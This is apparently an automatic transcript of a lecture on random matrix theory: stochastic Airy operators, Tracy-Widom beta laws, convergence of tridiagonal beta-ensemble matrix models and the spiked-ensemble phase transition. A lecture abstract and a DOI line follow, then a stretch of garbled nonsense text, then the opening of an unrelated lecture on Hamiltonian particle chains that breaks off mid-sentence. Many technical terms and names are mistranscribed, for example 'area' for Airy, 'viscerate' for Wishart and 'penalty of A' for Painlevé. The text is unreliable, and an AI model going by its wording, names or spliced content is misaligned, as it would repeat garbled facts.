it is. And this is almost surely, again, path by path, there's a minimizing sequence, right? And it converges to something and I'm defining this lambda tilde, not, I mean, a lot of notation. But this random variable will be almost surely bounded below because this form is almost surely bounded below, right? Again, maybe big negative, but I don't care. Okay. And now here's the deal. When you have this minimizing sequence, why do you want such inequality? If you have, if you're taking a minimizing sequence, you have, because you're minimizing a prory control of an H1 norm, right? An L2 norm and a moment. So you have path by path control of H1, of L2 and a moment. So you have such control. You can at least extract a subsequence that converges in H1, converges in L2 and then you might be concerned that this subsequence, you lose mass, right? That can happen just because you have a sequence converging in H1 and L2. It doesn't mean that it's zero in the limit. But it won't be zero because you also have control of x times f squared. That gives you tightness. So you can't get mass wandering off to infinity, right? So in fact, you have, you can pick a subsequence called fn prime, okay? And converges to some object that is going to live in L and it converges weakly in H1. It converges in L2 properly and it's going to convert uniformly on compacts because you have control of the H1 norm and on the line, the H1 norm gives you holder something, like a half, right? So you have that continuity. So it converges on us to an oddistic odd function, right? A random function, right? Mega by omega, you have this convergence, okay? All right. And then what can you conclude? The point is, now you can conclude that the infimum is actually realized, right? There is a subsequence such that this holds, right? They convert it to some f not. And you have this equality, right? That was, we define this to be the infimum and I'm saying there is a function at which this is realized, right? And again, this is a mega by a mega, but then this is an eigenfunction, right? Why is this a eigenfunction? Because then you play the trick. So maybe this is silly to even write out, but then you have this lambda not tilde, okay? Well, let's just do, okay, fine. I'm rewriting this, yeah. F not H beta, F not. But this is the minimum, right? For this quantity. So if you play the game, you do something like this. You go back into this quadratic form and you perturb. So I'm taking this F not, which exists and it's the minimizing function. You know, you do something like this. And this is again, completely classical now, except that it's classical for every realization. So phi is some compactly supported functions, move compactly supported function. You take a derivative, you set epsilon equal to zero. This is going to be zero because it's the minimizer, almost surely, right? And if you just do that and read it out, what is it going to look like? It's going to look like the eigenvalue problem, right? For H in distribution. And that's the best you can hope for because, you know, your potential is a distribution. So this is how you define the minimizer, right? And the corresponding. So what I'm saying here, that's really an eigenfunction, then we simply declare this lambda squiggle not is lambda not. It's the ground state eigenvalue. And right now I'm just defining that as Tracy Wood and beta. And the definition will have byte once I show that you really have convergence of the discrete operators to the same quantity. Any questions? Yeah? Okay. Yeah. No, absolutely not. Path by path. And Brown is saying, yeah. So I mean, you're making a deterministic argument, but you're able to do it. Omega by omega. What does it mean that you can eliminate the order? Oh, I mean, I mean, no, this is just, I'm saying, you know, there was some object that's the minimizer, right? And I'm saying now that's, we can declare it. I wanted to reserve this notation for eigenvalues proper. And really I'm saying this really is an eigenvalue. There's no change, right? I'm just, I'm erasing the tilde. The tilde was in case it didn't work out, right? But it worked out so we can erase the tilde. Okay. And then, you know, just, you can define higher, higher order eigenvalues and eigenfunctions for stochastic area, area through, you can do Raleigh-Ritz, right? So again, first with tilde, which will then erase, right? You say, I'm going to minimize, because now I have a ground state. I have an honesty God ground state eigenfunction. And I'm going to take minimizers over all that perpendicular to that. But again, when I do that minimization problem, I'll have control in L2. And if I can control in L2, the minimizer of this problem will, in the limit, still be orthogonal to F naught. You know, it'll give me something else. All right? Okay, so. Does that show you that lambda zero tilde is bounded almost surely or something like that? Well, it's almost surely finite above and below, right? It's not bounded. I mean, you can't find, right? There's not, there's not, we've probably won a given finite number, right? But it's, it's, it's an almost surely finite random variable. All right? It doesn't have any mass at either end point. Is that, yeah. That, that's, that's, that's what it shows. Okay, so you know, you can go through the classical Raleigh-Ritz thing and push the same kind of argument through and just iterate. How do you probably know that? I mean, you have, you can write something down. Well, it's, it's, it's inequality. This constant is almost surely, right? The minimizer, I mean, here's a lower bound on the quadratic form. Erase this. Right? And I'm minimizing over functions that have L2 norm one. So it's just this minus, which, again, this constant comes from that random saubol of inequality. I, I, you know, I quote him to call it that, right? But it's, it's, it's almost surely, you know, it's bound below. It's back to the statement that capital C is, is somehow almost surely finite. We find that, yeah. Each real thing. Exactly. Exactly. So the sense of quadratic form is the minimum, the minimum of the, okay? Okay, no. Okay, so here's just, you know, even, even at this stage, there's some payoffs. Okay. So this is just, I'd like to, you know, tell you this, here's some cute little things you can do. So this stochastic area operator, it's called stochastic area because you take area and you add white noise, right? So I just made a big deal about the fact that white noise is not a small perturbation of the, of the area operator, but for large energies, it kind of is. So you can rework what we had. So I'm using this curly A or Cal A for the classical area operator. And you can rework what we just did to show the following that as operators are as quadratic form stochastic area, for any epsilon you like, there's again some random constants that are stochastic area operator. Looks like one plus epsilon area plus some big random constant times the identity here and then bounded below by one minus epsilon area minus some big random constant. In the sense of quadratic forms, the same proof will show that. And then, you know, here's a cute thing. So the stochastic, sorry, no, stochastic. The regular area operator has eigenvalues that are the zeros of the area function, right? So it is known that the high for large K, the big, the large K eigenvalues of area look like this, right? Now, if you feed that into here, you can show the capital lambda k from the eigenvalues of random area, stochastic area, that you have the same sort of asymptotics with probably one. So for high energy levels, random area looks like regular area. And that should make sense because you go deep into the area process, it becomes more and more regular. And this is kind of a statement of that. Of course, the low lying eigenvalues, right? It's very random, right? Because this is a big random constant, or random constant I have no control over. But when I look at high energies, I can kind of wash that out, in a sense. And so this is a cute fact about random very. Okay. Because we can just, what's the way the epsilon is small? Oh, I can pick it, right? It's, I can, yeah. So it has to do with, how do I say this nicely? Well, it's, okay. Let me go. Where do I have the, I should write the quadratic form. If here's our quadratic form, no, that's not our quadratic form. This was poor planning. This thing I can make look like epsilon times this, right? Plus a big random constant. So above, I get one plus epsilon times basically the areas quadratic. Yeah, do you see? Okay. And then below. Okay. Okay, sorry. All right. So now I want to get into the convergence proof, okay? And then, you know, the philosophy of how we even define stochastic area really guides how the convergence proof goes. It all goes through the quadratic form, right? Okay. So, so remember our matrix model, you have these gangausions on the diagonal, these, these kies on the off diagonal, all right? And you know, for a, a matrix, there's no controversy in defining, so I'm going to call Tracy Woodham beta n, right? The nth approximate to Tracy Woodham. It is the minimization of this matrix, right? This is, you know, there's nothing, nothing fancy going on, right? So you take your matrix, the rescaled beta Hermite matrix, and you minimize over the, whatever, vectors of, of L2 norm, little L2 norm one, right? And that's the definition of the ground state. Okay. And so, you know, you got to write that thing out, all right? You just kind of write what that thing looks like. And you write what that thing looks like, you know, knowing what you want, right? We want to show that this, in a sense, what we're going to show is, okay, so this random discrete quadratic form goes to our continuum quadratic form. So our continuum quadratic form had some, you know, h1, h1 norm, you know, gradient f squared plus some x, plus some, you know, again, deterministic potential, and then, and then noise, all right? So you massage things, so you get a gradient x squared, right? You want that in there, so you put it in there. And then, you know, what's going on here and all those notations, I'm just pushing the noise to the end, all right? So this a to k is what? This a to k is this beta times this thing, that comes from completing the square here. That is, you know, you need to put it in, so you put it in, you take it out. And then remember, down in the noise terms, I have some chi's. And whenever you have some random variables, you just normalize them, so you should, you know, subtract off the mean, you know, subtract off the mean, if you subtract it off, you got to put it back in. So then I put all the deterministic stuff in the next term, all right? And this is just what you get, all right? And then you have two noise terms, one that comes from the diagonal, so the y1, the y super ones are just this process of now differently rescaled gaussians, and then the y2 is a centered and scaled chi, which I don't even write up because it's gross, right? That's just a bunch of n's and betas and chi's that have been normalized by their means, all right? But this is just what, this is what it is, all right? Okay. Okay, and then I want to look at this random quadratic form. Okay, so this is what we want to show, we want to show minimizing this, you know, matrix inner product in our n, right? Converges to this object, right? In this sub-love space. Okay, so one issue here is that, you know, these quadratic forms live on different spaces, but that's not so much an issue, right? Because you can think of a matrix acting in L2 by taking the function that you wanted to act on and discretizing in the appropriate way. And you know how you want to discretize, too, because you know what the continuum scale, the continuum scale is supposed to be n to the minus one-third. So if now you think of your matrix, right? Your rescaled Baylor-Hermit matrix, as when you act on a vector, you say, no, I'm really acting on functions in L2 that I've taken such that, you know, I have this function supported on the half line, I chop it off at n to the two-thirds, okay? And then I break it up into little n to the one-third chunks, n to the minus one-third chunks. That gives me n chunks on the right spatial scaling. And that's really where this thing is living. And that way they're living on the same space, right? Okay, so this is what I'm writing here. So we're going to embed this discriminantization problem into L2 by doing exactly what I just said. So I wrote it the other way, for any vector in L2 you identify it with some function, a piecewise constant function in big L2, right? And then when you think that way, all I'm doing is I'm rewriting the previous slide with these normalizations in there, right? So that gives you kind of a new normalization. So every v, you see, the v, vk, you really want to think that looks like some f of k on n to the one-third times one on n to the one-sixth. And so you're pre-scaling the vectors, right? So that's the right scaling to take. So if you're paying attention to minute details, some of these scalings have changed from the previous slide, but it's just been put in the right space. Otherwise, it's identical. And here's what you notice. A calculation shows, so here's your gradient squared. That's beautiful. You know what to do with that in the continuum. But then you have all this other junk, right? And it's a very easy exercise to show that the running sum of these deterministic potentials go to x squared over 2, and the running sum of the noise and the potential goes to 2 on square root of beta times Brownian motion. This is classical central limit theorem. This is a sum of independent random variables. And in fact, this is the kind of thing the theorem will give you. It'll show tracewind convergence by a simple functional central limit theorem. It basically comes down to you want to prove tracewind for some family-tri-agonal operators. You take off, and you expect it, and you want to recognize this convergence through stochastic area. Well, stochastic area is Laplacian plus something. So you factor off the Laplacian from your tracewind matrix model, and the rest of the something you view as potential. You never prove anything converters to white noise. The way you prove something converters to white noise is prove the running sum of it converters to Brownian motion. So if you can prove the running potential goes to x squared over 2 plus Brownian motion, you're kind of done, right? Well, you're not done, but that's the idea. So this is like, I call this an improved heuristic over Adelman and Sutton, because this is just the better place to do things. The better place to do things is at the quadratic form, and because the potential is delicate, you've got to deal with the integrated potential. That's all. So what do you sum by parts to get to these objects? Yeah, you do a little summation by parts. Because there's no v's in there. Well, there's no v's, because here I'm just looking at thinking of just potential by itself. But in the guts of the proof, you sum by parts because you got it. You sum by parts because even at the continuator, you had to integrate by parts to be able to control the things. So you sum those series up there by parts to get some. Yeah, you're going to, yeah. In the proof. The difference of the v's. Yeah, exactly. You're going to, you know, all this potential, you're not going to understand this thing point-wise. It's too delicate, right? If you do a summation by parts through, I'm saying what you're going to get, you're going to get at things of this type. Right? This is the running potential up to the continuum position, running random potential up to the continuum position. This is easy, right? At least at the level of point-wise convergence in x and distribution of convergence on this part. And that's the way to identify, that's the right place to identify stochastic error. Okay, but this is all still needs to, you know, you need some estimates, okay? So what do you need to do? It's the same, it's almost the same kind of thing. You need to show this discrete quadratic form is bounded below. Right? Again, almost surely. And, but now in n, right? So here is the kind of thing we prove. So yes, very much as in the proof of stochastic error, here is, you remember, this was one of our random noise terms, right? The y super one were just our rescaled gauges. We prove an inequality like this. Some small constant times, what is all this stuff? You know what that is? That's a discrete version of our Sobolov norm from before. It's the appropriate discrete version, right? And then we prove here's your L2 norm, right, on the appropriate scale, and there's a random constant, right? A random variable. This random variable depends on a little c you want to put here. It depends on all the noise terms here. Here there are a bunch of gauges, right? But it also depends on n. Like, it depends on n because for each n you have a different problem. But you prove that this sequence of random variables is tight. And so if you don't know that language, this means this is the sequence of random variables that is precompact, meaning that it'll have sub sequential limits in distribution. So at least over subsequences, it's bounded. It's bounded. And so I just wrote one down, but for both noise terms, the other noise term is the thing with the chi's. We have a similar inequality. This is what I'm saying. Any questions? What does the cn come for? This is what we want to prove. So here's what we want to prove. It's again, okay. So we have these noise terms that are worrisome, right? But what I'm going to prove is I can bound them by a small constant times the good part of the discrete quadratic form plus some junk times the L2 norm. And when we compute discrete eigenvalues, you minimize over vectors such that this object is 1. But you get some random stuff, right? Some random error. But what we prove, and what's the statement here is that anyone could get an inequality like this, just write it down. But what you can prove is that this sequence of capital C's, which are random, they're tight. It's a tight sequence of random variables, right? So it's the next back thing to them being uniformly bounded below an n, right? Because at least you'll have them uniformly bounded below over subsequences, okay? So a tight random variable such as probabilistic mumbo-jumbo, in probability we have a different word for everything. Tight is sequentially compact, that's what it means, in distribution, okay? That first sum is exactly one of the terms that we call it. Exactly, exactly, exactly. It's that first noise term, exactly. And we have an exact inequality. It's just gross to write them both out, right? But for each noise term, we have such an inequality with the same kind of C's. So what does this translate to? This translates to, I mean, it should look familiar, right? Here is our discrete quadratic form, right? So if you're not really normalized, I can prove, and then, you know, for every n you have such a thing, what we can prove is that there's a deterministic constant times the right discrete h1 plus moment norm, and then maybe a sequence of constants times the little l2 norm and other sequence of random constants above. So it's the exact analog to what I had at the continuum, except these random constants now depend on n, because you have a sequence of problems. But again, they're tight. All right, and now this is what you do, all right? Because for the discrete problem, you have an honest to God, you know, minimal eigenvalue here and eigenvector, right? And of course, the eigenvector you're going to think about as a function, a discretized function in l2. So there's a subsequence such that, so the lambda naught n is the eigenvalue for this object, right? Because of this, there's at least a subsequence of lambda naughts indexed by n prime, and the corresponding eigenvector is such that this will converge to something, okay? And distribution, and this will converge, I mean, this one is work. This is immediate from these inequalities. This takes some work, but we can show, because again, over any minimizing sequence, these vectors, you have, you know, from control over kind of a discrete h1 and a discrete version of the moment bound, you can show this converges to a function that's in h1 and l2, okay? Yeah. Yeah. This n cn prime, the n ones of c or p, which you had before. Right, but remember now, the noise for every matrix model, you know, and the dimension keeps cranking up, you have new gaussians, right? So it depends, it also depends on n. Sure, and however horrible the c of b may be, the cn approximates it well, therefore, they're tight. But it's not even that, it's not, I mean, you can do that, right? Because here, I mean, in the following way, see what, okay, well, you'll understand this. So this might, but what you might think you would like to do is build all the gaussians and the kais in your matrix model on the same space as your Brownian motion, and then that's exactly what you would do. That's exactly the statement you would have. But you don't even have to do that because you can just show what you do, and that's what we did first, right? But then we realized what you can do is just show that that sequence, you just showed by itself that this sequence that depends on this, you know, these cn's that depend on your sequence of gaussians and your sequence of kais, if you just show them that by themselves is tight, what you do after the fact is you say scar-hut embedding, right? There is a probability space such that all these things live, these, all these gaussians and all these kais live on the same space as the Brownian motion in the limit, and then you do that. So you don't have to do that extra stuff, but it's morally, it's the same in a sense, right? So for any, you know, at least you have sub-sequential convergence, right? And then, and then of course this is work, but what you can show is that this limit actually with all after summing by parts and having control of the appropriate norms, you can push through this, this at least along sub-sequences, this discretized thing will go to, to something, right? So I'm going to, it'll go to something, I apologize. It'll go to f star hit against the stochastic area operator, go to the right continuum form, okay? And now what does that mean? That means you have this in the limit, all right? This means that your lambda star, right, and your f star are an eigenvalue, eigenvector pair for a stochastic area. Of course, you could have lost, right? They don't have to be the ground, it doesn't have to be the ground state anymore, right? They could, it just, all this, all this means, which you get by taking sub-sequential limits, is that it is some eigenvalue, eigenvector pair. So you need another argument to show that it actually is the ground state, right? That you don't, you don't go up the chain of eigenvalues for stochastic area. And once you have that, then the proof is done, right? Because you said, because at this point you said, well, it just means that over any subsequence I have some limits, but now you play the game, right? Ken is the bad guy, you know, he gives me some subsequence of operators, and I say, from any subsequence of operators, I can choose a further subsequence of this happens. So then you play the subsequence of subsequence game. So every possible, you know, for every subsequence of operators going to infinity, I take a further subsequence such that all this, this holds, and there's another argument to make this inequality, and that identifies the thing. So then you can really call, you know, now you can really call this lambda naught, Tracy Wood and beta, because it is really the distributional limit of these beta Hermite guys. So I mean, there's a lot of technical stuff in there, but that's the philosophy. Any questions? Okay, so that's the convergence proof. Yeah. So the capital C n's, those are simple objects that you can estimate because you have Gaussians and what are the chi-squared variables? Yeah, I mean, there's some, there's, yeah, I mean, there's some. At some level on the proof, there's some functional of soups of Gaussians and chi's and things like this, but yeah. I was going to ask, is it, is it the case that actually the statements about capital C being bounded almost surely come from taking these limits? No, no, no. The capital C, that was, that was done at the level of the stochastic, like the actual limiting stochastic area, and that came from. Just making sure I understand a lot. Yeah. I would see a way to prove that those things are bounded by using the finite dimensionals. But it's even better than continuum, right? Because I mean, I don't mean by understanding your question like this. And just proving stochastic areas bottom to below, it's a similar functional of a Brownian motion. Okay, so you guys just live in the infinite dimensional space. Yeah, yeah, I mean, you know, and you kind of need that, right? Because when I target this, right, I better have this thing defined somehow, right, ahead of time. Okay. You know what I'm saying? So at some point you have, you actually in this proof, at some point you have to think about stochastic, you know, you can imagine a little add and subtract, you know, you need to be able to, you know, you have your discrete vector, your discrete, your actually nth level eigenvector, and you got to, you have to think about that thing being hit against stochastic area, with the stochastic area with the Brownian motion in it. So you need those bounds of the continuum anyway, even ahead of time. Okay, so, you know, there are a whole wealth of ensembles for which you have Tracy Woodham convergence and this argument can work in most of those. So just want to give you an example and then try to give you what I think is one of the better applications to this whole random operator picture. So you know, we have these viscerate ensembles and these are matrix models of the form mm transpose, where m is n by m and all IID, right? And at this point it's classical that if you take real complex quaternion gaussians, right, these are Thaphan or detrimental processes, instead of Hermite functions you have LeGair functions, and you know, starting in the early 2000s, people approved Tracy Woodham fluctuations for the biggest eigenvalue, biggest rescaled eigenvalue of these viscerate ensembles. So it was done by Kurt Johansson in a complex gaussian case, he was actually after something in ASAP, Ian Johnstone, who's an actual statistician, you know, card-carrying member of the statistics tribe, proved it for the real viscer case because he's actually come up in statistical applications, right? So this is, you know, known stuff, right? On the other hand, there is a natural general beta version of all the LeGair or all the viscerate ensembles, whatever language you like. And here's what it looks like. Again, what I'm doing now is I'm just writing down, here's a density on endpoints, now on the positive line, right, because the eigenvalues of mm transpose are non-negative. So here is a density, again, Van de Maan to the beta, now against this kind of gross weight, right? So here's the deal. This is going to work, this is going to make sense for any beta positive, and any kappa that's bigger than n minus 1, all right? And the deal is that when beta is 1, 2, or 4 and kappa is m, this is exactly the eigenvalue density for those real complex work-attorney and Gaussian viscodes. So this is a family of, these are the LeGair beta ensembles, where you actually get to not just generalize beta, but generalize one of the dimensions to a real variable that, you know, if that turns your crank, right? You don't need integers in both dimension coordinates, okay? And there is a matrix model, too, a tridiagonal matrix model for all beta. This is, again, work of Dmitriy Umedelman, and this is what it looks like now. So to cook up the tridiagonal matrix model for the whole LeGair beta-LeGair family, you do the following. First, you cook a random upper-bi-diagonal family, which has a descending sequence of chi's on the diagonal and the op-diagonal. The sequence of chi's is tied to the first dimension component and the other to the second, okay? All chi's appearing here are independent, right? I'm like, even if, you know, notation gets reused if k happens to be n, you know, but these are all, everything inside is independent. And then the third theorem is, if you look at BB transpose, the eigenvalues of that thing have joint density beta-LeGair, okay? And it's, you know, a little exercise you can show yourself for any m. If m is an actual m by n, honest to God, matrix of independence, say, real or complex gauges, forget the Quaternion case, you know, you can find u and v such that this object, right, if you rotate m by some unitary on the left and some unitary on the right, you can bidiagonalize any gaussian matrix by, again, the same sort of house-holder transformations we had before, okay? So if you do, you know, this thing times its transpose, right, you eat the v in the middle and you maintain the same spectrum, and that's how it works. Okay, so here's the theorem, you know, it's not that exciting at this stage, but, you know, for the biggest, okay, so there is, okay, you form this bi-diagonal and then you do this, bb transpose, now that's tridiagonal, and the eigenvalues of this thing, right, because this thing, you know, this thing may not, all right, if you like, you can say the singular values of this dude are the singular values of the guy. Okay, so just, you know, for completeness, right, if you take the ordered eigenvalues of the general Bayer-Laguerre ensemble, right, and you form these kind of gross-looking scaling constants, then the theorem is that if I center and scale any k eigenvalues of Bayer-Laguerre in this way, these converge to the ordered eigenvalues of stochastic area. And if there's anything nice about this, it's that, you know, the history of this problem is that, you know, somebody did it for the complex case, somebody did it for the real case, that somebody for the real case was Ian Johnstone, as I mentioned, and in his original proof, you know, he required that the aspect ratio of, you know, kappa over n, in his case, kappa was an integer, you know, had to be bounded above and below uniformly as n went to infinity. And then, in statistics, apparently, there are cases where you really care about the aspect ratio, either blowing off to infinity or going to zero, this comes up. So other people wrote other papers in the real case for, you know, crazy, right? And this theorem does it all in one, you know, it's all together in one swoop. Yeah. Yeah. That's at the hard edge. I'm at the biggest edge. I will talk about hard edge. Yeah, but yeah, so this is at the biggest, at the smallest eigenvalue, you can get Tracy with him and you can get Bessel, depending on. And do you have signal on field with this? Yeah, yeah, yeah, we have an operator for Bessel, so that'll be tomorrow, tomorrow, tomorrow. Okay, so, okay, so you have, so they're fine, okay? But this isn't, I think, super exciting, this is just to show that, you know, you can work through the same kind of ideas. So here's an honest-to-guide application and it's tied to what are called these spike distributions. So Ian Johnstone, same character, asked the following question, what happens to Tracy with him for quote, unquote, non-null, viscid ensembles? So the null viscid ensembles, really when you have M transpose and M is all ID centered Gaussians, right? But for statistical problems, they care about things like this, you know, M sum sigma, which is called the population covariance M transpose for a general sigma, right? So you know, if you really want to base hypothesis tests on the biggest argument on Tracy with him, you'd be interested in like what kind of sigmas break Tracy with him, right? And he even asked the question, look, I'd be happy if you could do the following. Take sigma to be the quote unquote, this is where the spike comes from. I'll take sigma just to have a bunch, instead of being the identity, you know, C1, C2, C3, right? Three different constants and all the rest ones, right? In what, in what cases can you, can you mess up Tracy with him, right? By putting different constants there. Okay, and this is one of these situations where they, you know, I think the answer is more fascinating than the question. So in 2005, Baikman and Ruchin Pesh showed there's a phase transition in these problems and the spiked ensembles. And here I'm just going to demonstrate what they did for r equals one for one spike, right? So the sigma here, where are you, sigma, is just C, then a bunch of ones, just one, you just take one entry and you screw it up, right? So what they showed, there's a critical, there's a critical, this is a little math for XC, right? There's a critical value of this C. It depends on the aspect ratio, on the dimensions, you can compute it. But if C is below this critical value, nothing happens, right? In the sense that you still get Tracy with him, right? You know, it makes sense. And you start off at one, you push it up a little, you expect there to be some room. And I'm using the same notation, sigma and N are the sigma and N I had on the previous slide. So same, same settering and scaling, same limit law. If C is bigger than the critical value, you change the settering and scaling and you get a simple CLT. What happens there, the idea is if you push that constant too big, the biggest eigenvalue actually jumps out of the spectrum, right? And just wiggles as an independent Gaussian by itself. You have the density of states and the biggest eigenvalue actually escapes and just fluctuates in a very classical way, okay? And then there's actually a tuning around the critical value. If you do this, all right, just say you do it. So you take C to be the critical value plus something going down like N to the minus one thirds and then you take the limits N goes to infinity. With the same settering and scaling, you get a new family of distributions which depend on this extra parameter. And then new family of distributions looks like Tracy with him times something and there's something can also be written in terms of panel of A2, right? Something like me express in terms of the wax pair for panel of A2. And just here, like I just want to mention, the beta equals two is absolutely critical, right? This is a detournamental thing. Subsequently to this, Mo did work for beta equals one and then there was a partial result for beta equals four using the analysis and the Fafnian processes by Dong Wang. But the whole random operator point of view really makes kind of quick work of this. So the deal is you can still try to diagonalize, right? So again, just thinking of one spike and a cute little exercise is remember what you have now, do I have some chalk, right? You think of M just being all IED Gaussian and then you take C's and a bunch of ones and M transpose, right? We'll take this matrix and write it as, you know, this is silly, right? Squared of C and a bunch of ones and squared of C and a bunch of ones, right? You put this one with this guy and this one with that guy and all you do is you change one row or column of your M depending on how you're looking at it. And then you just do the same procedure and you can still try to diagonalize and you get the same sort of try diagonal model. The only thing... I'm not saying the transition is C, no. Why isn't it C? Why isn't it C? I don't know, you do the work and you know... Why does anything happen? You sit down and you prove it. Well, I mean that's an interesting thing, right? It's showing that at some level you don't see the signal through the noise, right? You can be looking at an ensemble that you actually can move one of your vectors is not standard Gaussian. It's Gaussian with a shifted variance and your biggest eigenotus doesn't see it, right? So that actually has content for people that do PCA stuff on a daily basis. So yeah, I don't know either. Yes? So just to make sure I understood, you just wrote this down and I guess the claim is that that is a parameterization of spiked beta model. Sure and so then what you do is you put this guy here, you pair this guy with this M, this is a Gaussian matrix and you bi-diagonalize that. So when you do that, all that happens is that you just change that same tri-diagonal matrix model I showed you, nothing changes except you shift one entry. No, my question was before that, the statement is that that with M, IID random and main around this quantity exactly has eigenvalues that are distributed by the spike to spike. Oh yeah, absolutely. Okay. So I mean you go through this tri-diagonalization stuff and you see you get the exact same tri-diagonal matrix model except you change one entry and then you think well what can that, how can that do anything in the limit, right? And there's almost nothing in the limit. So this is a result of Blomendalen-Varag, Blomendalen was a student of Bell and Varag. So at criticality, so I'm using this notation, remember B was our bi-diagonal matrix when I'm calling it BC for where I shift that one entry, BC times BC transpose when I take C to be the critical value plus the shift. This converges into the now familiar operator sense to stochastic area. The only difference is we change the Dirichlet boundary condition to a Robon boundary condition where that parameter shows up, right? So in fact you have a whole general beta spiked in some sequence of eigenvalues. So stochastic area with maybe a different boundary condition, right? For different betas and different W's, there's a whole family of ground states, right? And by taking omega or just W whatever you want to call it to infinity, that's classical quote unquote Tracy with the beta. Okay. So that's the theorem and I won't show how that works. But let me, if you can give me one more second, I'll show what I think is the best payoff of this is the following. You can still play the Riccati game, all right? So I'm in a corollary of having Tracy Woodham was having this theorem about if I want to actually, you know, write down a formula for its distribution function, the way that the context do this and is like cook up this little diffusion and ask that it never explodes, it never explodes to minus infinity. And you remember what you did there is you looked at a shooting eigenfunction, right? You look for a phi. Is that a psi? I don't know. It depends on X in a fixed lamb. It's satisfying your eigenvalue problem. But for the Dirichlet case, you want to start it off with at zero and at one. But the Rabon case, you started off at one, psi zero is one and psi prime is omega, right? That's the right shooting for the Rabon case. And when you look at the Riccati, you don't start at infinity anymore. You start off at omega at a finite place. And if you carry through what I did yesterday, the upshot is the general Tracy Woodham beta law is the probability of this little diffusion starting off at time lambda, lambda is the spectral parameter at spatial point W and asking that never explodes. So all the Tracy Woodham beta laws are tied to the same diffusion just for different starting times and different starting places. And then here's just a fundamental fact. Any Markov process, if you take any Markov process and ask for the probability that it never leaves its domain, that's a quote unquote harmonic function for the process, which means that that probability is killed by its generator. So what you're looking at here is you're looking at P, you're looking at the spatial process and implicitly you're looking at time. So almost immediately, it means that if you write, here I'm writing, this is the distribution function for Tracy Woodham beta. It solves this PDE. This is just the PDE that's defined to be the space times generator. If I look at the diffusion P along with this time coordinate, that's just automatic. It requires no work. So you can prove that this PDE is a unique bounded solution with the right boundary conditions are that you're looking for an affidavit, a distribution function in lambda. And then if you fix that to this PDE, you can show that it has a unique bounded solution. So that thing will be the Tracy Woodham beta distribution function. So there's much to do about how you can get formulas for beta 124 and for different spiking levels and blah, blah, blah. But this PDE has actually been used as a starting point for Igor Rumidov to get the first penalty of A formulas outside of beta equals six. And so Igor has this work where he gets penalty of A. It's again, in terms of penalty of A two for beta equals six, this is the first beta for which there's been any exact formulas. I would argue that probability is an exact enough formula. But if you like exact formulas, Igor has done that. But I don't know the full story. So Igor did something, and then I know that Professor Itzend Tamara cleaned some of his asymptotics up, or maybe he got something wrong. They can tell you more about it. But this has actually been used to get penalty of A formulas. That's the point. All right. I know. I'm over. All right. Thank you. So excuse me. Did I understand correctly that it is possible to define all these, let's say, quadratic forms on the same probability space, and then just the quadratic forms would converge to the limit quadratic form, and just then the eigenvalues would be random variables on the same quadratic space, and there would be convergence in terms of, so to speak, the operators themselves understood their Dirichlet forms. Exactly. That's really how the proof works. So the proof really is an almost sure statement. So we show with probability one, the first eigenvalue convergence, we can do it again, the second eigenvalue. And so this is all almost sure. So if you have 17 almostures, then you can back up and say jointly in distribution. One. Well, yeah. Yeah. I mean, do for the second eigenvalue, the third eigenvalue, up to the 17 eigenvalues. And every statement is with probability one. So then you have joint weak convergence, which is how we advertise it. Yes, Professor? I have a remark. Okay, yeah, yeah. What's the real deal? The very last explanation, Saak. Yeah. So the more exact, of course, in Romanian paper, it is, you have to express, you have to, you have to, you have to solve some auxiliary complicated ODE. Okay. And only, or equivalently, you can say that you can express the trace with a 4-beta equal 6, even 4-beta equal any even. Right. In terms of the not-believeable collager of the solution. This also was shown by Romano. But only recently, only just, you know, a year ago, it was finally shown that this collager in the system is integrable. Okay. It's integrable in the sense of it is a work of Bertala, Rupsov, and Kaffas. Okay. So in a sense, it was very important step what Romano did. But it was, you know, we have a paper with the mother, and Kaffa and Mizadri, when we explained the, the, the, the, the, the, the, the, the, the, the, the, the, the after-matter pocket was still a lot of work. But now it is sort of, in the very good setting. So now indeed, it is for all even. Are you all even beta? Even better. We can say that the trace you're doing is indeed represented by some integrable systems. Okay. I see. I see. I see. Okay. So let's thank Brian again and go for lunch. All right. Another narrow escape. Okay.
Random matrix theory is an asymptotic spectral theory. For a given ensemble of n by n matrices, one aims to proves limit theorems for the eigenvalues as the dimension tends to infinity. One of the more remarkable aspects of the subject is that it has introduced important new points of concentration in the space of distributions. Take for example the Tracy-Widom laws. First discovered as the fluctuation limit for the spectral radius of certain Gaussian Hermitian matrices, these laws are now understood to govern the behavior of a wide range of nonlinear phenomena in mathematical physics (exclusion processes, random growth models, etc.) My aim here will be to describe a relatively new approach to limit theorems for random matrices. Instead of focussing on some particular spectral statistic, one rather understands the large dimensional limit as a continuum limit, demonstrating that the matrices themselves converge to some random differential operators. This method is especially suited to the so-called beta ensembles, which generalize the classical Gaussian Unitary and Orthogonal Ensembles (GUE/GOE), and can be viewed in their own right as models of coulomb gases. The first lecture will review the underlying analytic structure of the just mentioned classical ensembles (essential to, for example, Tracy and Widom’s original work), and then introduce the beta ensembles along with our main players: the stochastic Airy, Bessel, and Sine operators. These operators provide complete characterizations of the general edge and bulk statistics for the beta-ensembles and as such generalize all previously discovered limit theorems for say GUE/GOE. Lecture two will provide the rigorous framework for these operators, as well as an overview of the proofs of the implied operator convergence. The last lectures will be devoted to upshots and applications of these new characterizations of random matrix limits: tail estimates for general beta Tracy-Widom, a simple PDE description of the Baik-Ben Arous-Peche phase transition", approaches to universality, and so on.
10.5446/54168 (DOI)
Extremne gen蓬. Bebo, da je tuk planeti beli prikad, če putboxing ide, da sporavana pomele. Stavlji moždeti bilaинов. Prevar reduced in kveč knije promisedido na primer pump. Ferj il generation troubling, in da crys njegorn antem pikriti od kot njsка sv Darti. Iako ta ljede, jaz pogledam pomele in storov, v ponču 10 år. In s poslednik invud solamente lepetmore processing in mer commun 테† in prizmaruj Даšrge in se potcksugar na protegralji lem ♥ bude k narnessmska ep sk sechsningba matematiko nozi. Nistično eventska bese machines. Trebuna tega....if there is another one. OK. So, regarding the second topic, I mean, there is some more experimental mathematics. So let me explain the setting. So the setting is the following. So we consider one dimensional system, very simple problem. So, we take a system of two n plus one particle, and this is just for convenience. And with an Hamiltonian, where we have nearest neighbor interaction potential V, and, I mean, a single point interaction potential W. So the equation of motion are Hamiltonian and are given by the Hamiltonian equation in the form above. So we consider both the Rischle or periodic boundary condition. So this is the setting, and so the equation are deterministic. And so in this setting, so there are a lot of examples that you can have, harmonic chain, FPU, total lattice. So the first and third case are integrable cases. The one in the middle is, I mean, is clearly non-integrable. OK. So this is a very clear setting. So we have a hodee with some potential that can make the equation integrable or non-integrable. So what I want to do next. So I want to study this equation with the random initial data. So I take as a initial measure the 